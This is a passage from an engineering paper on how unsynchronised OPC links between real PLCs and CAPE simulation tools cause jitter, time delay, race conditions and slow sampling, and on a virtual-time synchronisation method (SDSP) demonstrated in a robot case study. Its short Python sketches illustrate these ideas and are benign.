Freund et al. [20] have identified and described the integration problem between a real PLC and the remaining part of the simulation model. The main problems identified include a lack of time synchronization and a real-time data transfer mechanism. The time synchronization problem is due to the fact that the CAPE part of the simulation model runs in another time space (virtual time) compared to the introduced PLC, which runs in real time. Ma et al. [15] identify the problem with real-time dependent control system functions, e.g., timers, when other parts of the simulation run in virtual time.

There are several different methods to include a PLC in a simulation. In [21], the simulation uses interfaces to a fieldbus for communicating with the PLC. A more general approach is to use the OPC interface that is presented in detail in this paper.

A. Realistic Robot Simulation (RRS)

Realistic Robot Simulation (RRS) is a standard interface between robot simulation tools and robot control systems. By using RRS, it is possible to use offline-created control programs in the real robot without any correction [22]. The main driving force for the RRS project was the error introduced in simulated robot paths due to a lack of realistic simulation of the controller behavior. The idea of RRS is to integrate the part of the robot motion control software that is responsible for the motion behavior into the simulation system. Hence, the simulation is controlled by the same motion control strategies as the real robot will be [23]. In 1998, the RRS-2 project was started; its aim was to cover the full functionality of robot controllers. Further, the RRS consortium has presented a solution for simulating the control function of general PLCs [10], [23], [24]. This approach is based on virtual controllers, developed by the PLC manufacturer, connected to the simulation tool. However, to the authors' knowledge there is no product available today that uses this approach.

B. Fieldbus Emulation

Fieldbus emulation is a technique to include the target fieldbus in the simulation. The main purpose of fieldbus emulation is to test the real PLC code with correct addresses and the complexity of the real bus. This allows verification of hardware configurations and signal allocations. It also enables the developer to use the real I/O-dependent variable names and symbols. A real or emulated PLC is connected to the virtual fieldbus, and the bus nodes are modelled inside the CAPE tool. Fieldbus emulation can be found in, e.g., WinMOD. Most of the existing fieldbus emulators do not address the unreliable verification introduced by the simulation. However, SIMBA Pro and SIMIT address this by adding additional hardware. They offer the possibility to implement small models on board dedicated hardware. For larger models they offer an OPC connection to more standard CAPE tools. Further, SIMBA Pro and SIMIT are Siemens S7-specific solutions and not generic. For relatively slow processes and small systems this might be an efficient way. With extensive simulation models, real-time operation indeed becomes an issue. It is possible to combine the proposed synchronization method presented in this article with fieldbus emulation techniques to ensure correct behavior in all circumstances. A fieldbus emulator for Profibus and CAN has been implemented to test this.
However, this is not the focus of this paper and is therefore only mentioned in passing.

C. OPC

OPC was founded by a few companies in the mid 90s in order to ease the exchange of process data [25]. OPC has been, and still is, developed by the OPC Foundation [26]. OPC is server-client based, where the server is vendor-specific and the client general. OPC consists of several specifications [25]-[27]. These specifications contain information about how the server and the client should exchange data. OPC DA (Data Access) was the first specification [28] that made it possible for any OPC DA client to access data from an OPC DA server that fulfils the same specification. OPC DA is used for moving real-time data from devices to Microsoft Windows applications, where real-time here means current data in the device, not historical data. Nothing is said about how the data is transferred from the device to the application, and real-time is not defined either. OPC DA is based on COM/DCOM, which is a Microsoft technology. This choice leads to platform dependency, and there is, for instance, no standard solution for using OPC on Linux, even though such solutions exist. Another issue with OPC is the problem with firewalls when the OPC client and server are located on different machines. This is due to DCOM, a problem that can, however, be overcome by a tunneller [29].

A first attempt to select another platform than COM/DCOM was presented with the OPC XML-DA specification, where COM/DCOM was replaced by web services. However, the performance was very poor compared to OPC DA [30]. To overcome this weakness, a new specification was introduced, called OPC Unified Architecture (OPC UA) [31]. OPC UA uses two different transport protocols: SOAP over HTTP and TCP [32]. Compared to OPC XML-DA, OPC UA also supports binary encoding of the data instead of the XML encoding that produces a large amount of overhead data. OPC UA is somewhat slower than OPC DA, between 1.1 and 1.6 times slower when reading values [32]. According to Matrikon [33], the plan is not to replace OPC DA with OPC UA; instead, both specifications should coexist and complement each other. OPC DA is still the most common specification: 99% of all OPC products today are implementations based on OPC DA [32]. Since this paper deals with CAPE tools, and to the authors' knowledge there is no commercial CAPE tool available today that supports OPC UA, only OPC DA is considered. OPC UA is, however, very interesting. PLCOpen [34], a worldwide organization that works on resolving topics related to control programming, has chosen OPC UA as its technology for data exchange. An alternative to OPC DA is the OMG [35] specification Data Acquisition from Industrial Systems (DAIS) [36]. DAIS is based on real-time CORBA [37]. However, this specification is not used in the type of application covered in this paper. CAPE tools and PLCs of today generally utilize OPC for intercommunication.
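As a concrete illustration of the client-server data exchange that OPC provides, the short Python sketch below reads and writes a PLC tag through OPC UA using the open-source python-opcua package. It is only an illustration of the general mechanism: the endpoint URL and node identifier are assumptions, the paper itself works with OPC DA (COM/DCOM-based) clients embedded in CAPE tools, and nothing in this snippet addresses the synchronization problems discussed in the rest of the paper.

from opcua import Client   # python-opcua package (OPC UA, not the OPC DA used in the paper)

# Assumed endpoint and node id of a variable exposed by a PLC or soft PLC server.
ENDPOINT = "opc.tcp://localhost:4840"
NODE_ID = "ns=2;s=Shear.ixDown"

client = Client(ENDPOINT)
client.connect()
try:
    node = client.get_node(NODE_ID)
    print("current value:", node.get_value())   # read the tag from the server cache
    node.set_value(True)                         # write a new value back
finally:
    client.disconnect()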
D. OPC Together With CAPE Tools

The possibility of including real PLCs in CAPE tools has been around since the mid 90s, utilizing vendor-specific protocols. Some common purposes are offline programming, verification, and optimization. Since the beginning of the last decade, many CAPE tools have an OPC client implemented, usually an OPC DA client, which makes it possible to connect to any OPC DA server [38]. The I/Os in the PLC control code are made available to the OPC server. CAPE tools usually have some kind of signal representation similar to real machines, e.g., a start signal for a robot. These signals are then mapped to the I/Os from the PLC via OPC. The simulated machine or process can thereby be controlled in the same way as it would be in reality. Examples of CAPE software with OPC functionality include Delmia Automation, Visual Components, Process Simulate, and Arena.

E. OPC Communication

To ease further discussion of OPC, a model of OPC communication is introduced, see Fig. 1 (OPC communication model). Fig. 1 shows a general model for how an application (1), with an integrated OPC client (2), can connect to a PLC (8). There are three different communication parts in this model: the OPC interface (3), i.e., COM/DCOM, the communication interface (5) between the OPC server (4) and the gateway (6), and the gateway interface (7) to the PLC. There might be other models, where, e.g., the OPC server has an integrated gateway, but the principle is still the same. Another scenario is an integrated OPC server in the PLC, where (6) and (7) might be unnecessary. In general, the model is valid for a standard OPC connection.

III. IDENTIFIED PROBLEMS WITH CURRENT INTERFACES

With today's general OPC interface it is easy to connect a PLC to a simulation tool for, e.g., verification purposes. However, when verifying PLC control code with this method, one might encounter several unexpected problems due to free-wheeling. Free-wheeling is defined in this paper as asynchronous execution of the PLC and the simulation tool. These problems will indeed affect the result and lead to unreliable verification. The problems identified in this paper can be divided into four main categories, namely: time delay, jitter, race condition, and slow sampling. These will be described in detail in the following subsections. OPC UA, which was mentioned earlier, does not introduce any mechanism that would solve this problem, so the rest of this paper will only deal with OPC DA, since it is the most commonly used specification today.

A PLC-controlled sheet metal shear will be used as an example to explain the different problem categories, see Fig. 2 (explanatory sketch of the example application). A typical shearing line is used to produce sheet metal blanks of the desired length. In this example two actuators, 1 and 2, are used to drive the shear blade up and down. Two sensors, Sensor_1 and Sensor_2, are used to level the shear blade at the upper position. Each actuator is equipped with a position feedback sensor to be able to control the lower position limit. A kinematic simulation model of the described process was implemented and then connected to a real PLC via OPC to demonstrate the phenomena. The PLC has a cycle time of T_PLC. A simplified PLC code example of the low-level control is shown in Fig. 3 (part of the PLC program to control the sheet metal shear, implemented in IEC 61131-3 Ladder Diagram; ixDown and ixUp are the signals that run the shear blade down and up). It represents the PLC (8) in the model described in Fig. 1. To be able to perform an accurate and reliable simulation, all values from the simulation should be considered in the PLC and vice versa.
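Since the ladder logic of Fig. 3 is only available as a figure, the following Python sketch gives a rough, behaviour-level approximation of such low-level shear control, purely for illustration. The signal names (ixUp, ixDown, Sensor_1, Sensor_2, the position feedbacks) follow the example description, while the normalised positions, the speed constant and the levelling rule are assumptions.

# Minimal behaviour-level sketch of the sheet metal shear low-level control.
# Assumptions: positions are normalised to 0.0 (lower limit) .. 1.0 (upper limit),
# and Sensor_1/Sensor_2 become True when the corresponding actuator reaches the top.

LOWER_LIMIT = 0.0   # assumed lower position limit enforced via the feedback sensors
SPEED = 0.05        # assumed blade travel per PLC scan

def plc_scan(ix_up, ix_down, pos1, pos2, sensor1, sensor2):
    """One PLC scan: returns the commanded velocities for actuators 1 and 2."""
    v1 = v2 = 0.0
    if ix_up and not ix_down:
        # Drive upwards; stop each actuator when its upper sensor is reached,
        # which levels the blade at the upper position.
        v1 = 0.0 if sensor1 else SPEED
        v2 = 0.0 if sensor2 else SPEED
    elif ix_down and not ix_up:
        # Drive downwards; the position feedback limits the stroke.
        v1 = -SPEED if pos1 > LOWER_LIMIT else 0.0
        v2 = -SPEED if pos2 > LOWER_LIMIT else 0.0
    return v1, v2

# Example scan: blade commanded down from mid-stroke.
print(plc_scan(ix_up=False, ix_down=True, pos1=0.5, pos2=0.5,
               sensor1=False, sensor2=False))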
The tools (hardware and software) that have been used in this paper are as follows:
- CoDeSys Soft PLC [39]
- Binar Bifas 60 PLC [40]
- CoDeSys OPC server (supports OPC DA 2.0) [39]
- Process Simulate
- Integration Objects OPC Data Access client SDK (supports OPC DA 2.05) [41]
- a sheet metal shear model

A. Free-Wheeling

Running a PLC and a simulation asynchronously, i.e., the PLC running at its own pace with respect to the simulation pace, is defined in this paper as free-wheeling. Free-wheeling appears to be the most commonly used scenario today when connecting real PLCs to CAPE simulations. Free-wheeling introduces four major issues, namely jitter, race condition, slow sampling and time delay. Simulations using OPC or similar techniques that do not consider these four problems will in this paper be referred to as unreliable simulations. The classification presented in this paper (time delay, jitter, race condition and slow sampling) is not covered in the literature in relation to OPC communication and CAPE tools. All four issues are usually presented in the literature as one common, unspecified issue or problem; in this paper, it is referred to as free-wheeling.

B. Common Solution to the Free-Wheeling Problems

The most common solution found in the literature to the problems introduced by free-wheeling is synchronization through halt, based on the assumption that the CAPE tool has the possibility to run faster than the PLC [15], [39], [40]. According to this assumption, it should be possible to halt or slow down, when necessary, the faster CAPE tool in order to maintain a synchronized system. However, these time synchronization methods are shown in this paper not to work. To show this effect, such a synchronization method was applied in the sheet metal shear example. A high-speed timer was used in the simulation to achieve high accuracy and to match the PLC cycle time. This timer was used to halt the simulation in order to achieve a synchronized system. The result of the experiment, shown in Fig. 4 (measured actuator position during the simulation of the sheet metal shear; each line represents a run, and each run was carried out under exactly the same conditions), reveals the behavior of an unreliable verification. If the suggested methods in the literature had worked as expected, Fig. 4 would have shown one single straight line.

C. Jitter and Time Delay

The cycle time of the CAPE tool, (1) in Fig. 1, here denoted T_CAPE, is the time needed for the simulated actuators to execute new values. Theoretically, if T_CAPE is not equal to T_PLC, nondeterministic behavior might arise. In practice, due to the non-real-time behavior of common operating systems, T_CAPE is indeed not equal to T_PLC. In essence, the problem is that a regular PC, its operating system and the CAPE tools cannot be considered to be a real-time system [42], and a non-real-time system is not designed to respond to time-dependent signals in a deterministic way. The common suggestion found in the literature is to speed up the CAPE simulation. However, T_CAPE must still be exactly equal to T_PLC to guarantee deterministic behavior. No working mechanism exists in the OPC specification that can solve this problem.
Even if it were possible to run CAPE tools at the same pace as the real PLC, there would still be time uncertainties due to the microprocessors in regular computers and the operating system. This phenomenon is referred to as jitter [43]. Jitter can be defined as randomly varying time delays [44]. If a constant time offset exists, it can be referred to as time delay. Hence, the total time uncertainty is jitter + time delay. The complicated communication paths in the OPC specification, see Fig. 1, introduce jitter and time delay. This is indeed intensified if a communication component with low bandwidth is part of the OPC chain. The jitter and time delay cause unreliable verification results.

For instance, the OPC interface (3), based on COM and DCOM, can introduce problems because of its lack of real-time support [45]. In [45], a possible approach to providing real-time support for COM is presented, provided that the underlying operating system supports real-time operations. Since OPC uses COM for the communication between the server and the client, it is possible to apply this approach. However, there are, to the authors' knowledge, no examples of industrial CAPE tools that support real-time operations, and thus there would still be a problem with the lack of real-time support in the communication model presented in Fig. 1.

To demonstrate the result of jitter, i.e., randomly varying time delays, the sheet metal shear example was set up to run with a PLC scan cycle of 10 ms and a simulation scan cycle of 10 ms. The OPC update rate was set to 1 ms for the OPC client group used; see the OPC group object in the OPC DA specification [28] for more details. The position of Actuator 1 was measured and plotted in Fig. 4 for six different runs. Given the deterministic behavior of both the PLC and the kinematic model, the expected outcome is six identical runs. However, due to the jitter introduced by the OPC interface, or due to a possibly skewed PC clock, the outcome is unreliable and stochastic. The test was carried out both on a soft PLC and a real PLC, with the same result. The target equipment, e.g., sensors and actuators, might introduce jitter depending on mechanical or electrical properties. However, the jitter found in the real equipment does not correspond to the one introduced by the OPC interface. The intention of this work is to eliminate phenomena, such as jitter, introduced by the simulation tools. If it is important to include the jitter from the real equipment in the simulation, it should be modelled in a standard way, e.g., as a normal distribution.
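The effect of free-wheeling can be reproduced without any OPC stack at all. The following Python sketch is a simplified abstraction, not the setup used in the paper: it runs the same deterministic plant and controller once in lockstep and twice with a random transfer delay between "PLC" and "simulation" (free-wheeling with jitter). The lockstep runs are identical, while the free-wheeling runs diverge from each other. The plant model, the delay distribution and the numeric constants are assumptions.

import random

def run(jitter_steps=0, seed=None, steps=400):
    """Co-simulate a one-axis actuator and a bang-bang controller.

    jitter_steps > 0 emulates free-wheeling: the controller reads a position
    value that is delayed by a random number of simulation steps, the way an
    OPC-style exchange with jitter and time delay would deliver it.
    """
    rng = random.Random(seed)
    pos, direction = 0.0, +1
    history = [pos]
    for _ in range(steps):
        delay = rng.randint(0, jitter_steps) if jitter_steps else 0
        seen = history[max(0, len(history) - 1 - delay)]   # possibly stale sample
        if seen >= 1.0:                                    # controller: reverse at limits
            direction = -1
        elif seen <= 0.0:
            direction = +1
        pos += 0.02 * direction                            # plant: constant-speed actuator
        history.append(round(pos, 6))
    return history

# Lockstep (no jitter): every run is identical, as Fig. 4 should have looked.
assert run(0, seed=1) == run(0, seed=2)

# Free-wheeling with jitter: same control logic, same plant, yet the runs differ,
# e.g. in how far the blade overshoots the upper limit before reversing.
print(max(run(5, seed=1)), max(run(5, seed=2)))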
D. Race Condition

A race condition arises when the result is dependent on the sequence or timing of several events. A race condition might occur when two or more OPC-dependent variables change at the same time (i.e., in the same cycle), but the result is transferred to the receiver at different times. The problem can be explained by the following sheet metal shear example, where the code section in Fig. 5 (sheet metal shear alignment code example in IEC 61131-3) is used for detecting misalignment of the shear blade. The result is simulated behavior that differs from the real one, see Fig. 6 (two identical simulations of the calibration code in Fig. 5; in Run 1 a race condition occurs, and the OK signal is not triggered as it is in Run 2). This error will not occur in the real application, but it will cause unnecessary troubleshooting. There is no mechanism in the OPC specification that can guarantee correct behavior in this situation. This behavior is actually described in the OPC DA specification, and the solution to the problem is additional handshaking and flag passing between the client and server [28]. This behavior can also be referred to as inexact synchronization [46].

E. Slow Sampling

An OPC client specifies the fastest rate at which data changes may be updated from the server, i.e., the sampling rate. However, this sampling rate is not necessarily the same rate at which data will be transferred between the PLC and the OPC server. Indeed, the sampling rate is crucial for a deterministic and reliable simulation. Changes that are faster than the update rate will not be recognized by the client, see Fig. 7 (example of slow sampling). In the sheet metal shear example, the upper sensor signals Sensor_1 and Sensor_2 are critical input signals from the process. However, with an OPC update rate that does not match the PLC or the simulation, slow sampling problems may easily occur.
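Both effects are easy to reproduce in isolation. The sketch below is an illustrative abstraction rather than the authors' test setup: it models an OPC-like cache that forwards two logically coupled signals at slightly different times (race condition), and a client that polls a fast sensor pulse at a slower update rate (slow sampling). The signal names and timing constants are assumed.

# Race condition: the PLC updates two coupled signals in the same scan, but the
# client sees them arrive one update apart, so a consistency check fires falsely.
plc_writes = [  # (blade side 1 at top, blade side 2 at top) written in one PLC scan
    (False, False),
    (True, True),    # both upper sensors switch in the same cycle
]
client_view = {"s1": False, "s2": False}
alarms = []
for s1, s2 in plc_writes:
    client_view["s1"] = s1              # first variable delivered ...
    if client_view["s1"] != client_view["s2"]:
        alarms.append("misalignment")   # spurious: only one side appears raised
    client_view["s2"] = s2              # ... second variable delivered later
print(alarms)                           # ['misalignment'] although the PLC was consistent

# Slow sampling: a 10 ms sensor pulse is invisible to a client polling every 50 ms.
def sensor(t_ms):                       # pulse between 105 ms and 115 ms
    return 105 <= t_ms < 115

seen_by_client = any(sensor(t) for t in range(0, 500, 50))   # 50 ms update rate
seen_by_plc = any(sensor(t) for t in range(0, 500, 10))      # 10 ms PLC scan
print(seen_by_plc, seen_by_client)      # True False: the client misses the pulse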
F. New Standard

The purpose of OPC has never been to supply CAPE tools with data in real time; this functionality has been adopted by the CAPE tool vendors. It would, however, be possible to use OPC as a more extensive tool for PLC code verification if the PLC vendors, CAPE vendors and the OPC Foundation could agree on an extension to OPC in which some kind of synchronization is built into the specification. The purpose of the synchronization is to achieve reliable simulation results. A proposal for this extension is presented at the end of this paper.

IV. SDSP SIMULATION ARCHITECTURE

Due to the lack of suitable, reliable and deterministic methods for the verification of PLCs together with CAPE tools, an architecture for distributed simulation and time synchronization, SDSP, was formulated in [48]. Distributed simulation with SDSP is not discussed further in this paper; for more information and examples see, e.g., [47] and [48]. SDSP is responsible for the following:
- communication with all simulation clients;
- a common synchronized time;
- common simulation data, e.g., I/Os;
- handling of distributed simulation.

SDSP is a server-client-based concept, with the server being responsible for managing the simulation. Whilst SDSP is mainly based on TCP/IP, other methods of communication are possible, such as, for instance, DDE, OPC or shared memory. One of the most important tasks for the server is to manage each subset of simulations to form an overall time-uniform simulation. The way in which this can be accomplished is set out below. In order to use a CAPE tool in this concept, the tool must have an application programming interface (API) that makes it possible to include an SDSP client within the tool. This client can then handle the communication between the CAPE tool and the SDSP server. This is a common feature of many CAPE tools, e.g., ROSE for Robcad and the Tecnomatix .NET SDK for Process Simulate.

In essence, the server contains common data (e.g., I/O values, servo values, and simulation parameters) and common logic. The server also contains an overall simulation or virtual time and a state set {server.start, server.initial-write, server.pre-write, server.write, server.pre-read, server.read}, see Fig. 8 (states and associated actions for the simulation as represented in the SDSP server, described in SFC; the qualifier P1 means that the action is executed once at the entrance of the step, P0 once at the exit of the step, and RE means that the synchronize event is triggered on a rising edge).

Initially, the server sets up the necessary structure in the database and sets the overall simulation state to server.start. As a minimum requirement to form a simulation, the server needs information about the time step (the smallest time step that the overall simulation can handle), a formal start condition start, and the number of clients N. The start condition tells the server when the entire simulation can commence; generally, the start condition defines when all clients required to run the simulation are ready to start. A delay mechanism allows a client to run with a time step larger than that of the overall simulation without sacrificing time synchronization. For example, the delay mechanism can be used in discrete event simulations to postpone the synchronization of a specific client until the time of its next event. A client is considered to be ready to start when it has been connected to the server and has joined the simulation. When the start condition is fulfilled, the initial write state, server.initial-write, is entered. N is the number of clients in the simulation; the start logic argument can be used to introduce additional conditions for the start of the simulation.

Fig. 9 shows the states and associated actions for each client (subsimulation) as represented in the SDSP server, described in SFC; the qualifier P1 means that the action is executed once at the entrance of the step, and N means that the action is executed as long as the step is active, but after P1.

This mechanism provides deterministic start behavior for the overall simulation. In the initial write state, each client has reached its client.setup state, where it is supposed to initialize its own data (e.g., all inputs and outputs are set to 0), while the overall simulation time, the virtual time t_v, is also set to 0. To enter the following states, a synchronize condition must be fulfilled; in line with the formal model in the Appendix, it holds when every client has either raised its ready signal or is currently delayed. The ready signal indicates whether a single simulation client is still running (FALSE) or has finished executing the current time step (TRUE).

After the initial write state, the overall simulation enters the pre-read and then the read state, see Fig. 8. Each client reaches its client.read state synchronously, see Fig. 9. In this state, each client is supposed to read data from the server. When all of the clients have executed their client read task and thereafter are synchronized by the server, the overall simulation enters the pre-write state, server.pre-write. At the same time all clients enter the client.run state and are supposed to execute their main tasks, e.g., a program cycle for a PLC. The virtual time t_v is updated to the next time step at the read state, server.read, i.e., it is incremented by one time step. This tight synchronization procedure is necessary for a reliable simulation, and to prevent clients from acting in the wrong time space, i.e., one time step before or after the desired time. To verify that this concept works, a formal model of the server-client concept has been formulated in NuSMV [11], see the Appendix. This model allowed it to be verified, among other results, that the clients follow each other synchronously.
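The essence of this lockstep scheme can be captured in a few lines. The following Python sketch is a single-process abstraction of the SDSP idea, not its TCP/IP implementation: a coordinator only advances the shared virtual time once every registered client has read the shared I/O, executed its step and written its results back. The class and method names are invented for illustration.

class LockstepServer:
    """Toy SDSP-style coordinator: shared I/O table plus a common virtual time."""

    def __init__(self, dt):
        self.dt = dt
        self.t_v = 0
        self.io = {}          # common simulation data (I/O values)
        self.clients = []

    def join(self, client):
        self.clients.append(client)

    def step(self):
        # Read phase: every client samples the shared data for time t_v.
        snapshots = [c.read(dict(self.io), self.t_v) for c in self.clients]
        # Run and write phase: every client executes exactly one step and
        # publishes its outputs; only then is the virtual time advanced.
        for client, snap in zip(self.clients, snapshots):
            self.io.update(client.run_and_write(snap, self.dt))
        self.t_v += self.dt


class CounterClient:
    """Stand-in for a PLC or CAPE client: counts the scans it has executed."""

    def __init__(self, name):
        self.name, self.scans = name, 0

    def read(self, io, t_v):
        return io             # snapshot of the inputs for this time step

    def run_and_write(self, snapshot, dt):
        self.scans += 1       # one (and only one) cycle per virtual time step
        return {self.name + "_scans": self.scans}


server = LockstepServer(dt=1)
plc, cape = CounterClient("plc"), CounterClient("cape")
server.join(plc)
server.join(cape)
for _ in range(100):
    server.step()
print(server.t_v, plc.scans, cape.scans)   # 100 100 100: no cycle lost or duplicated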
V. TIME SYNCHRONIZATION WITH PLCS

The SDSP simulation architecture presented above is designed to handle verification of time-dependent control code in PLCs connected to CAPE tools, i.e., to deal with the four problems described previously: time delay, jitter, race condition, and slow sampling.

The internal clock in a PLC controls the execution to guarantee the cycle time and to achieve deterministic behavior. Due to this fundamental behavior of the real PLC, it has previously only been possible to incorporate an emulated or simulated PLC in the SDSP simulation architecture. Emulation of a PLC is a technique used to obtain an exact representation of a real PLC [49]. In [47], an emulator of a PLC was used and extended to include a number of additional SDSP functionalities, thus making it possible to use it in conjunction with the time synchronization mechanism. Even though an emulator is a good representation of a PLC, the real PLC is nevertheless preferable in many situations. This is because of a lack of emulators, coupled with the fact that creating an emulator can be extremely time-consuming. However, even if it is possible to connect PLCs to the simulation architecture over OPC, it is not possible to directly time synchronize them with the mechanism within the architecture. To overcome this hurdle, a general method for the time synchronization of an IEC 61131-3-based PLC is described in this section.

In order to utilize the new time synchronization method, the following requirements must be fulfilled:
- the PLC must support the IEC 61131-3 programming language standard;
- the PLC must be able to communicate with a regular computer, e.g., via OPC;
- the entire simulation must utilize an architecture that offers a time synchronization mechanism.

IEC 61131 is an international standard for programmable controllers and is divided into several parts. IEC 61131-3 [50] describes a PLC software structure, languages and program execution [51]. In order to use the method presented in this paper, three modifications to the original control code to be verified need to be made: (1) a scheduler Program Organization Unit (POU), which is used as a complement to the original scheduler, must be added to the control code; (2) all program POUs within the configuration need a specific execution control function; and (3) all time-dependent function blocks and functions must be converted to deal with virtual time. The sections marked in Fig. 10 (description of the supervisor POU and its connection to the normal POUs) represent these modifications and are described below.

A. The POU Scheduler (1)

In order to implement a complementary scheduler, all POUs within the configuration must be set to the same priority, e.g., 1, and organised in the same task. The complementary scheduler POU is set to a higher priority, e.g., 0. This guarantees that the scheduler is executed first in every program cycle. The scheduler communicates with the SDSP architecture through two synchronization variables via, e.g., OPC.
When it is time to execute the control code in the PLC, the scheduler receives a signal from the server and decides which of the other POUs should be executed by sending specific execution signals, see Fig. 10. There is no standard or general way to halt the real-time clock on a real PLC, as demanded by the simulation architecture. Consequently, the scheduler also handles the virtual time, t_v, by reading the current value from the simulation server. This time is then stored as a global resource. The resource is then used as a replacement for the real-time clock.

B. Execution Controller (2)

To be able to control the execution order and timing of all POUs within a configuration, certain additional functionality must be added to each scheduled POU. This is accomplished by means of a specific header and footer. This execution control can be implemented for all IEC 61131-3 languages. The execution controller, described in pseudocode in Fig. 11, determines whether or not the desired program should run; a sketch of this pattern is given after this subsection.

However, the graphical language SFC has a more complex execution order that requires another type of execution controller [52]. An SFC consists of a series of steps and transitions, where each step can be associated with one or a series of actions [51], the behavior of an action being determined by its action qualifier. For example, the qualifier N means that the action executes while the step is active, and the qualifier L executes it for a limited time, defined by T. According to the IEC 61131-3 standard [50], each action is associated with an instance of an Action Control function block. This function block controls the activation and deactivation of the action, depending on the action qualifier used. Because some of the action qualifiers are time dependent, the PLC programming environment must offer access to modify the action control function block in order to be able to use the proposed method within an SFC POU. The internal time-dependent functions used in the function block must be updated so that they can handle virtual time, and an extra execution signal must be added that enables the SFC POU to execute at the correct time. In SFC, the transitions between steps can also be time dependent, i.e., a particular step can be active for a specific amount of time. This can be solved if it is possible to control these transitions. Should this not be possible, however, the same behavior can be obtained within the actions.
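The pseudocode of Fig. 11 is only reproduced as a figure, so the following Python sketch approximates the intent of the scheduler and execution-controller pair as described above: every scheduled POU is wrapped in a header that returns immediately unless its execute flag has been set by the scheduler, and the scheduler only sets those flags when the server signals that the next virtual time step may run. The flag names, the callback structure and the server stub are assumptions, not the authors' IEC 61131-3 code.

class ScheduledPOU:
    """Wraps a program POU with the execution-controller header/footer."""

    def __init__(self, name, body):
        self.name = name
        self.body = body          # the original program logic
        self.execute = False      # execution signal set by the scheduler

    def scan(self, t_v):
        if not self.execute:      # header: skip this cycle if not released
            return
        self.body(t_v)            # original control code, now driven by t_v
        self.execute = False      # footer: consume the execution signal


class SchedulerPOU:
    """Complementary scheduler: highest priority, runs first every PLC cycle."""

    def __init__(self, pous):
        self.pous = pous
        self.t_v = 0.0            # global resource replacing the real-time clock

    def scan(self, server_run_signal, server_virtual_time):
        self.t_v = server_virtual_time        # read virtual time from the server
        if server_run_signal:                 # server releases one control cycle
            for pou in self.pous:
                pou.execute = True


# One simulated PLC cycle: scheduler first, then the program POUs.
pou = ScheduledPOU("shear_ctrl", lambda t: print("shear_ctrl ran at t_v =", t))
sched = SchedulerPOU([pou])
sched.scan(server_run_signal=True, server_virtual_time=0.01)
pou.scan(sched.t_v)               # executes once
pou.scan(sched.t_v)               # header blocks a second, unreleased execution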
C. Time Dependent Functions (3)

IEC 61131-3 contains four standard timer function blocks: Timer On Delay (TON), Timer Off Delay (TOF), Timer Pulse (TP) and Real-Time Clock (RTC) [50]. However, these function blocks cannot be used directly, since they are usually based on the hardware clock, which continues to run even when the clock should be halted according to the server. Therefore, special replacement timers are used. The replacement timers behave in the same manner as the regular ones, the only difference being that they use the virtual time received from the server. The virtual time is updated for all clients in the simulation at the same time; a sketch of such a replacement timer is given at the end of this section.

There may also be other (non-IEC 61131-3) vendor-specific functions, such as motion control blocks, that depend on the hardware clock. Thus, in order to be able to use the proposed time synchronization method, these functions must also be upgraded to handle the virtual clock. For motion control [53], [54], PLCOpen [34] offers a motion control library specification based on IEC 61131-3. The PLCOpen Technical Committee 2 task force on motion control has defined a suite of specifications that define function blocks for motion control; see Fig. 12 for an example of a function block (a PLCOpen motion control function block) that can be used for controlling an axis with a fixed velocity. Later specifications also include coordinated multi-axis motion in 3D space. The first basic specification, released in 2005, has been implemented in over 30 products [34]. If the application that is to be programmed offline and simulated uses the PLCOpen motion control functions, it is possible to use a modified function block that uses the virtual clock.

In the proposed third edition of the IEC 61131-3 standard, there are some new features that might ease the implementation of these synchronization functionalities. One proposed feature is that it will be possible to call a POU program from another program.
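As an illustration of the replacement-timer idea, the following Python sketch mimics the behaviour of a TON (on-delay) timer driven by the virtual time distributed by the server instead of the hardware clock; when the virtual time is halted, the timer halts with it. The attribute names mirror the IEC 61131-3 TON interface (IN, PT, Q, ET), but the implementation itself is an assumption for illustration only.

class VirtualTimeTON:
    """On-delay timer driven by virtual time t_v instead of the hardware clock."""

    def __init__(self, pt):
        self.pt = pt          # preset time (delay), in virtual seconds
        self.q = False        # output: True once IN has been held for PT
        self.et = 0.0         # elapsed time
        self._start = None    # virtual time at which IN went True

    def update(self, in_signal, t_v):
        if in_signal:
            if self._start is None:
                self._start = t_v
            self.et = min(t_v - self._start, self.pt)
            self.q = self.et >= self.pt
        else:
            self._start, self.et, self.q = None, 0.0, False
        return self.q


ton = VirtualTimeTON(pt=0.5)
print(ton.update(True, t_v=0.0))   # False: delay not yet elapsed
print(ton.update(True, t_v=0.3))   # False: if t_v is halted here, ET freezes too
print(ton.update(True, t_v=0.6))   # True: 0.6 - 0.0 >= 0.5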
VI. CASE STUDY

A. Case Study Setup

To demonstrate the proposed time synchronization method and the disadvantages of unreliable simulation, a case study was set up. A real PLC from Binar [40] was programmed to control a two-dimensional servo-controlled robot. The robot was programmed, in IEC 61131-3, to follow the path described in Fig. 13 (the pre-programmed robot path used in Scenarios 1 and 2; the numbers represent the run order of the path, each being a 2D location (x, z)). A simulation model was created in a CAPE tool, Process Simulate. The model represents the 3D geometry and kinematics of the robot. Two scenarios were carried out: in Scenario 1, the CAPE tool was connected to the PLC in the unsynchronized way (free-wheeling) provided by CAPE tools today; in Scenario 2, the model was connected according to the synchronization method proposed in this paper. To be able to use Process Simulate with the proposed method, an adaptation of the software was made. This application reads and writes values to the SDSP server and overrides the internal simulation engine in Process Simulate in order to use the values from the SDSP server. To be able to utilize the new time synchronization method in Scenario 2, the following preparations were carried out in the PLC code:
- all tasks in the PLC configuration were set to the same priority and the same cycle time;
- a scheduler was implemented and added to the configuration;
- all timers in the configuration were replaced with modified timers using virtual time;
- an execution controller was added to each program;
- the servo control function blocks were replaced with new ones implementing time synchronization.

B. Results

Two test scenarios were set up: 1) with no time synchronization and 2) with the time synchronization method proposed here. Several cycles were executed in both scenarios. Fig. 14 (measured robot path without synchronization) shows the results from the runs when no time synchronization was used (1). The enlarged part shows the nondeterministic behavior when no time synchronization was employed, compared to the preprogrammed desired behavior in Fig. 13. This nondeterministic, unreliable behavior is due to the four problems described earlier. Fig. 15 (measured robot path with the new proposed time synchronization method) shows the results when the proposed time synchronization method was used (2). The plot clearly shows that the nondeterministic, unreliable behavior of Fig. 14 has disappeared. The results show that the suggested reliable time synchronization is necessary when verifying control code with CAPE tools. The case study was not intentionally designed to show unreliable behavior; it is an existing industrial application. All four issues discussed in the previous sections were found in this case study. Thus, these issues should not be neglected or considered marginal.

VII. PROPOSAL FOR AN EXTENSION OF OPC

